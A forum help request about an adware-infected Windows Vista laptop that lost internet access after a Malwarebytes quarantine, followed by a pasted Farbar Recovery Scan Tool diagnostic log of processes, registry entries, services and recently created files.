No internet access after MB scan of terribly infected PC


An elderly family member's PC was miserably slow and showing obvious signs of infection: programs such as ArcadeTwist, PremierOpinion, Slimware/Slimcleaner, and OneSystemCare, among others.

 

I downloaded and installed the free version of Malwarebytes and did a threat scan with it. It found over 2300 items. I attempted to quarantine them all, then something odd happened: Malwarebytes said "0 items successfully quarantined" and the Finish button froze. So I restarted the PC, and now it shows all the items (I assume, I didn't count) in the quarantine; however, the scan log from that scan shows nothing, zeros in every category.

 

Now, after that reboot, the PC cannot access the internet despite showing a network connection. Webpages cannot be accessed through either Firefox or IE, Malwarebytes can't access servers to update, and trying to "ping" google.com in Command Prompt doesn't work.

 

Needless to say, I can't download any other scan tools.

 

All help is appreciated, thank you.


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:24-01-2016
Ran by Barbara (administrator) on BARBARA-PC (26-01-2016 03:06:09)
Running from C:\Users\Barbara\Desktop
Loaded Profiles: Barbara (Available Profiles: Barbara)
Platform: Windows Vista Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Webroot Software, Inc. ) C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Agere Systems) C:\Windows\System32\agr64svc.exe
(TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\rselect\RSelSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe
(CyberLink) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
(Webroot Software, Inc.) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
(Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SSU.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7220768 2009-03-12] (Realtek Semiconductor)
HKLM\...\Run: [skytel] => C:\Program Files\Realtek\Audio\HDA\Skytel.exe [1833504 2009-03-12] (Realtek Semiconductor Corp.)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1713448 2009-03-18] (Synaptics Incorporated)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [487264 2009-03-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-12-18] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [900096 2009-03-23] (TOSHIBA Corporation)
HKLM\...\Run: [ThpSrv] => "C:\Windows\system32\thpsrv" /logon
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1451520 2009-04-14] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [236544 2009-03-24] (TOSHIBA Corporation)
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1584184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe [1123840 2009-03-24] (TOSHIBA Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
HKLM\...\Run: [LXCYCATS] => "rundll32" \3\LXCYtime.dll,RunDLLEntry
HKLM-x32\...\Run: [TUSBSleepChargeSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA USB Sleep and Charge Utility\TUSBSleepChargeSrv.exe [252288 2009-03-27] (TOSHIBA)
HKLM-x32\...\Run: [PCMAgent] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe [143360 2009-02-16] (CyberLink Corp.)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe [196608 2009-02-16] (CyberLink)
HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [61440 2009-04-22] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [NDSTray.exe] => C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe [304496 2009-03-17] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2513472 2009-04-16] (TOSHIBA)
HKLM-x32\...\Run: [spySweeper] => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [6515784 2009-11-06] (Webroot Software, Inc.)
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-11-18] (Google Inc.)
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\MountPoints2: {78e8348c-a981-11e4-be0a-001e33cd3101} - F:\LaunchU3.exe -a

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 0.0.0.1    mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{0D4D3689-2B0A-4854-86AC-74893CC38CA5}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://att.yahoo.com/
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://search.us.com/?guid={E21F1955-857E-42DF-B279-D58E6B168B3C}
SearchScopes: HKLM -> DefaultScope {C24898BE-DF94-459B-96E9-3B0EA8BD61C1} URL =
SearchScopes: HKLM -> OldSearch URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKU\.DEFAULT -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL =
SearchScopes: HKU\.DEFAULT -> {9F6F6BFF-5270-44E3-8D40-0F2D89A64F42} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=WBR&o=13993&src=kw&q={searchTerms}&locale=en_US&apn_ptnrs=^W5&apn_dtid=^YYYYYY^YY^US&apn_uid=1C0E9576-C62B-4A47-ABAA-A8CAF89B7691&apn_sauid=BC87ED7E-5FF1-4904-A76C-FAE6DCFDD564
SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> {61C6D6B3-6D52-43B0-BD8F-D5AA7A1E923E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11569
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
BHO-x32: Lexmark Toolbar -> {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -> C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] ()
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Lexmark Toolbar - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] ()
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\.DEFAULT -> No Name - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -  No File
Toolbar: HKU\.DEFAULT -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} -  No File
Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} -  No File

FireFox:
========
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441
FF DefaultSearchEngine.US: Google
FF SelectedSearchEngine: Default
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa2.dll [2008-08-20] (Google, Inc.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa3.dll [2015-02-13] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2015-05-18] (Coupons, Inc.)
FF Extension: Search Web Know - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\Extensions\{c220f16f-ba07-4e7e-98e9-662f66164d42}.xpi [2016-01-22] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2014-11-18] [not signed]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 camsvc; C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe [20544 2009-04-16] (TOSHIBA)
R2 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2009-03-06] (TOSHIBA CORPORATION) [File not signed]
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [1414128 2015-05-18] (Coupons.com Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [61440 2006-10-19] (Hewlett-Packard Company) [File not signed]
S3 lxcy_device; C:\Windows\system32\lxcycoms.exe [465408 2006-02-20] ( )
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.266\McCHSvc.exe [289256 2015-12-02] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
R2 RSELSVC; C:\Program Files\TOSHIBA\rselect\RSelSvc.exe [55808 2009-02-19] (TOSHIBA Corporation) [File not signed]
R2 TNaviSrv; C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2009-03-30] (TOSHIBA Corporation)
R2 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed]
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [251392 2009-04-14] (TOSHIBA Corporation) [File not signed]
R2 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [84480 2009-03-17] (TOSHIBA Corporation) [File not signed]
R2 WebrootSpySweeperService; C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe [4048240 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)
R2 WRConsumerService; C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe [1201640 2014-11-18] (Webroot Software, Inc. )

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
R0 ssfs0bbc; C:\Windows\System32\DRIVERS\ssfs0bbc.sys [37488 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
R0 ssidrv; C:\Windows\System32\DRIVERS\ssidrv.sys [135280 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2016-01-23] ()
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-26 03:06 - 2016-01-26 03:06 - 00019243 _____ C:\Users\Barbara\Desktop\FRST.txt
2016-01-26 03:04 - 2016-01-26 03:06 - 00000000 ____D C:\FRST
2016-01-26 03:04 - 2016-01-25 13:24 - 02370560 _____ (Farbar) C:\Users\Barbara\Desktop\FRST64.exe
2016-01-23 18:13 - 2016-01-23 18:21 - 00076944 _____ C:\Windows\ntbtlog.txt
2016-01-23 17:05 - 2016-01-24 02:52 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-01-23 17:05 - 2016-01-23 17:05 - 00000952 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-23 17:05 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-01-23 17:05 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-01-23 17:05 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-01-23 17:02 - 2016-01-23 17:03 - 22908888 _____ (Malwarebytes ) C:\Users\Barbara\Downloads\mbam-setup-2.2.0.1024.exe
2016-01-23 16:24 - 2016-01-23 16:24 - 00003446 _____ C:\Windows\System32\Tasks\Brooucnejo
2016-01-23 16:19 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\WebBar
2016-01-23 16:19 - 2016-01-23 18:07 - 00000000 ____D C:\Program Files\WebBar
2016-01-23 16:18 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\rqNhmm
2016-01-23 16:18 - 2016-01-23 18:06 - 00000000 ____D C:\ProgramData\CrimeWatch
2016-01-23 16:12 - 2014-08-18 15:51 - 00971576 ____N C:\Windows\system32\pmls64.dll
2016-01-23 16:12 - 2014-08-18 15:51 - 00660792 ____N C:\Windows\SysWOW64\pmls.dll
2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin
2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-01-23 16:11 - 2016-01-23 16:11 - 00023252 _____ C:\Windows\System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D}
2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-6363-0
2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-08c3-1
2016-01-23 16:10 - 2016-01-26 03:06 - 00000270 _____ C:\Windows\Tasks\PubMach138.job
2016-01-23 16:10 - 2016-01-23 23:38 - 00000274 _____ C:\Windows\Tasks\OutstandinDivisio6.job
2016-01-23 16:10 - 2016-01-23 19:43 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrazDivisio519
2016-01-23 16:10 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\NowUSeeItPlayer
2016-01-23 16:10 - 2016-01-23 18:06 - 00000000 ____D C:\Users\Barbara\AppData\Local\RustiSens806
2016-01-23 16:10 - 2016-01-23 16:10 - 00003162 _____ C:\Windows\System32\Tasks\OutstandinDivisio6
2016-01-23 16:10 - 2016-01-23 16:10 - 00003154 _____ C:\Windows\System32\Tasks\PubMach138
2016-01-17 12:03 - 2015-12-08 12:01 - 00801280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-01-17 12:03 - 2015-12-08 11:39 - 01065984 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 02873344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 01567744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01548288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01377792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01326080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 01114624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00867328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00767488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00759296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00650240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00605184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00212992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00613888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2VDEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ADEC.DLL
